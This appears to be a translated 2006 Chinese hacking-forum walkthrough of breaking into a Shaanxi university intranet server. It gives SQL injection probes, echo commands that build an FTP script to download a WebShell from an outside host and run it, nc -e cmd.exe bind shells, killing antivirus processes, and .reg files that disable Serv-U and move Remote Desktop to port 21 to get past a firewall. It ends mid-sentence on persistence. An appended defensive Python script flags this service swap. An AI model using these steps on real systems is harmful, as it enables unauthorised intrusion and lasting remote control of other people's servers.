Tricks of the trade in invading a Shaanxi university intranet: a vulnerability warning - Black Bar Security Net

ID MYHACK58:6220066250
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-01-10T00:00:00


Recently Black Anti has run many articles on breaking into college websites, most of them injection attacks. To follow the trend, I also went into a few university websites to play around. This time I found an injection vulnerability in a site inside a Shaanxi college, but getting the highest privileges really took some effort.

Step one: find the injection vulnerability. On one of its news display pages I appended a ' to the parameter, and it could be injected. To see what permissions I had, I then appended and user>0.

The error page showed the word dbo. Dizzying: I had SA permissions. I really don't know what's wrong with that administrator! Never mind; bring out Bright Kid's Domain (now at version 3.5; compared with other injection tools Domain still runs more smoothly, although its command echo is a bit worse).

Now that the injection point is found, let's get to work!

Step two: upload a file. With SA permissions you can run commands at administrator privilege. But the command echo of the usual tools is very poor (at least NBSI, Domain and the others I have used all share this problem), so first get a WebShell up. For that you need to find the web root directory, otherwise where would the WebShell go? Running dir a few times from Domain's command line finds it. By general habit the root directory is not nested too deep, and its name usually has some relation to the site. I doubt many administrators give the root directory a weird name and bury it deep in the hierarchy; administrators all share the same trait, they fear trouble and want convenience, but what is convenient for them is convenient for us too, heh heh. Soon the root directory turned out to be d:/ccs.

Then upload the WebShell! But the upload features of those injection tools are a bit of a problem: either small files go through and big ones die, or nothing uploads at all. If the ready-made tools can't upload, what then? Don't worry, we won't hang ourselves on one tree: download with FTP! In Domain's command line enter the following statements:

echo open showff.51.net>>c:\ftp
echo showff>>c:\ftp
echo 123456>>c:\ftp
echo cd public_html>>c:\ftp
echo get WebShell.asp d:\ccs\index_admin.asp>>c:\ftp
echo bye>>c:\ftp

Of course, first you need your own FTP space; I used Tiger Wing's FTP, which is very fast. This generates a file named ftp on the server's C: drive whose content is what was just entered. Then enter ftp -s:c:\ftp in the command line and click execute, and the WebShell is downloaded to our cute chicken (the compromised host). Enter the address in the browser and you are inside our WebShell; the one we downloaded is Haiyang (Marine) 2006, powerful and easy to use.

By now, if all you wanted was a WebShell, this would be enough; the Haiyang WebShell can do a great deal. But our goal is to go further and obtain greater privileges.

Step three: swap the services (steal the beams and change the pillars). Upload an nc with the WebShell, then run nc -e cmd.exe -l -p 43958 from Domain's command line, and from your own computer run telnet xxx.xxx.edu.cn 43958. No response; it shows "cannot connect to host". Very good, very normal: the server must have antivirus and firewall software. To confirm this, run netstat -a from Domain, and based on the returned results I telnetted to a few of the open ports.

Ports 80 and 21 were open and reachable; the other ports could not be used. So use pslist and pskill to kill the relevant antivirus and firewall processes! Of course I did, but it was not so simple. Although this server had the Rising firewall, after I turned it off and telnetted to nc again there was still no response. Why? (Thinking for a few seconds) Oh, actually very simple: this is an internal website inside a school, and somewhere around this server there is probably another kind of firewall or gateway that only allows external access to ports 80 and 21 of this server. But ports 80 and 21 are occupied; does that mean we cannot use our own trojan or get 3389 remote control? Not at all! Watch me use the beam-swapping trick. First we must realize that port 80 has to stay, or the site will soon be found to have been hacked, so only port 21 can be used. Generally only the administrator uses it for file uploads, so for now it will not be noticed. With the net start command I found the other side was running the Serv-U FTP server.

Step one: disable the Serv-U service so that it cannot start automatically at boot and occupy port 21. The method: edit a reg file with the following content:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
"Start"=dword:00000004

Note that there must be an empty line after REGEDIT4. For Start, 2 is automatic, 3 is manual and 4 is disabled; this corresponds one-to-one with the settings in Services. Save it as a .reg file, upload it to the server with the WebShell as d:/ccs/index/a.reg, and run regedit /s d:/ccs/index/a.reg from Domain; the Serv-U service is now disabled. Then use net stop serv-u in Domain to stop the existing ftp process.

Step two: change the Terminal Services port number. The original is 3389; change it to 21. You can edit the registry, or directly run an app that modifies the 3389 port. I used the x3389 program: upload it to the server and run x3389.exe 21 in Domain. Then try to open the 3389 service; there are many methods online, so I won't repeat them here. If you want Terminal Services to start automatically at boot, you also need a reg file with the following content:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

Save it as b.reg, upload it to the server and run regedit /s d:/ccs/index/b.reg. If opening Terminal Services seems like too much trouble, simply upload Radmin or another remote control program and set its port to 21; wouldn't that do? Step three: restart the server. Upload a reboot tool and restart. This is required for Terminal Services; if you use another trojan, a restart may not be needed. After the restart, run net start from Domain and Serv-U is gone, heh! Now you can swagger into the server. Here I only uploaded an nc to test the effect: run nc -e cmd.exe -l -p 21, then locally run telnet xxx.xxx.edu.cn 21, and the result comes back.
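For the defender's side of the three steps above, here is an added audit script (not from the original article) that parses a REGEDIT4 export and flags exactly this swap: an FTP service set to Start=4 while TermService is set to Start=2 and the RDP listener has been moved to port 21. The export text is constructed for the example; that the port change lands in the RDP-Tcp PortNumber value is an assumption, since the article only says x3389 was used.

```python
import re

# Constructed export in the same REGEDIT4 format as the article's a.reg and b.reg;
# 0x15 = 21. The PortNumber location is assumed, not stated by the article.
SAMPLE_REG = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000015
"""

START = {2: "auto", 3: "manual", 4: "disabled"}   # Start values as the article lists them
SERVICES = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
RDP_TCP = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
FTP_SERVICES = {"serv-u", "msftpsvc"}             # daemons expected to own port 21
VALUE_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')

def parse_reg(text):
    """Return {key: {value_name: int}} for the dword values in a REGEDIT4 export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and (m := VALUE_RE.match(line)):
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys

def audit(text):
    """Flag TermService auto-starting off 3389, and FTP disabled while RDP sits on 21."""
    keys = parse_reg(text)
    prefix = SERVICES + "\\"
    disabled_ftp = sorted(k[len(prefix):] for k, v in keys.items()
                          if k.startswith(prefix) and k[len(prefix):].lower() in FTP_SERVICES
                          and START.get(v.get("Start")) == "disabled")
    term_start = START.get(keys.get(prefix + "TermService", {}).get("Start"))
    port = keys.get(RDP_TCP, {}).get("PortNumber", 3389)
    findings = []
    if term_start == "auto" and port != 3389:
        findings.append(f"TermService auto-starts on non-default port {port}")
    if disabled_ftp and port == 21:
        findings.append(f"FTP service {disabled_ftp[0]} disabled while RDP is bound to port 21")
    return findings
```

On a live host the same checks apply to the output of regedit /e, and a port 21 that answers with the RDP handshake instead of an FTP banner confirms the finding from the network side.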

Summary: In fact, once the original FTP is disabled and port 21 is freed, the rest is easy. The main thing is noticing at the start that there is a firewall around the server and which ports it lets through. Knowing that, isn't the server our fish? Of course, to keep the broiler (compromised host) stable in the long term and undetected, it is best to use tunnel technology by